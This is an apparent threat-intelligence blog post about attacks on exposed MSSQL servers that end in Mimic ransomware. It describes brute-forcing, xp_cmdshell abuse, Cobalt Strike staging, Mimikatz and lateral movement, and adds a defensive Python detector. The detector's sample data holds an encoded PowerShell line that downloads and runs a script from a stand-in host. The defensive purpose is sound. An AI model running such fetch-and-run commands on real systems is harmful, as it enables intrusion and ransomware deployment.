
MSSQL Database Under Attack



Securonix Threat Research reports that exposed MSSQL database servers are being actively targeted in an attempt to deploy ransomware. The malicious activity has been attributed to a group tracked as "RE#TURGENCE."


Data in the Securonix report indicate that the actor uses both Turkish and English.


The attacks appear to be opportunistic in nature, as the actor seems to be looking for MSSQL database instances that can be brute-forced for initial intrusion. MSSQL servers are very widely used, making this threat quite significant for numerous organizations globally.



Figure: Identifiable MSSQL instances via cursory research in Shodan


There is reportedly a loose geographical focus: the majority of the targeting occurred against instances in the United States, the European Union, and Latin America. At the same time, such a geographically dispersed victimology may result from an opportunistic approach rather than a targeted one. Commands are run via xp_cmdshell, an extended stored procedure that is disabled by default and should remain so.


If the initial intrusion is successful, the actor executes PowerShell to run an encoded command that connects to an attacker-controlled server (88.214.26[.]3) and downloads a PowerShell script named '189Jt'. That script downloads a second stager, a separate PowerShell script ('MSjku'), which contains a heavily obfuscated Cobalt Strike payload. The payload is injected into the Windows process SndVol.exe, which controls the system's volume settings.
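As an added defender-side example (not from the Securonix report or this post), the following Python flags the process chain this intrusion relies on: cmd.exe spawned by sqlservr.exe, the footprint of xp_cmdshell, carrying an encoded PowerShell command, and decodes that command so the download URL can be reviewed. The log events and the 'attacker.example' host are constructed placeholders, not observed data.

```python
import base64
import re

# Constructed sample process-creation events (Sysmon Event ID 1 style), not real logs.
# The encoded command and the "attacker.example" host are placeholders built here.
ENCODED = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('http://attacker.example/189Jt')"
    .encode("utf-16le")
).decode()

SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Program Files\Microsoft SQL Server\MSSQL\Binn\sqlservr.exe",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": f"cmd.exe /c powershell -nop -w hidden -enc {ENCODED}"},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -Command Get-Process"},
]

# PowerShell accepts any unambiguous prefix of -EncodedCommand; the value is base64 of UTF-16LE.
ENC_FLAG = re.compile(r"(?i)(?:^|\s)-(?:encodedcommand|enc|en|ec|e)\s+([A-Za-z0-9+/=]+)")


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand payload, or None if absent or malformed."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def is_xp_cmdshell_child(event):
    """xp_cmdshell runs its command through cmd.exe as a child of sqlservr.exe."""
    return (event["ParentImage"].lower().endswith("sqlservr.exe")
            and event["Image"].lower().endswith("cmd.exe"))


def detect(events):
    """Flag sqlservr.exe -> cmd.exe launches that carry an encoded PowerShell command."""
    hits = []
    for ev in events:
        if is_xp_cmdshell_child(ev):
            decoded = decode_encoded_command(ev["CommandLine"])
            if decoded is not None:
                hits.append({"parent": ev["ParentImage"], "decoded": decoded})
    return hits


if __name__ == "__main__":
    for hit in detect(SAMPLE_EVENTS):
        print("xp_cmdshell -> encoded PowerShell:", hit["decoded"])
```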


Via Cobalt Strike, the attackers also downloaded and installed a copy of AnyDesk to maintain persistent access to the compromised machine and to install other tools, such as Mimikatz, to steal credentials. This way, the actor was also able to obtain a domain admin password.


Further reconnaissance of the compromised network was carried out via Advanced Port Scanner, another utility downloaded via AnyDesk.

Lateral movement was performed by abusing the domain admin password the actor had obtained via Mimikatz. At that stage, the actor was able to leverage living-off-the-land techniques and abuse PsExec to open a session to a domain controller.


The attack chain culminated with the deployment of the Mimic ransomware.


If you are interested in specifics or additional insights on the threats above or any other threat, please visit our dedicated service page or reach out to info@clipeusintelligence.com with your inquiry. We would be glad to assist you.
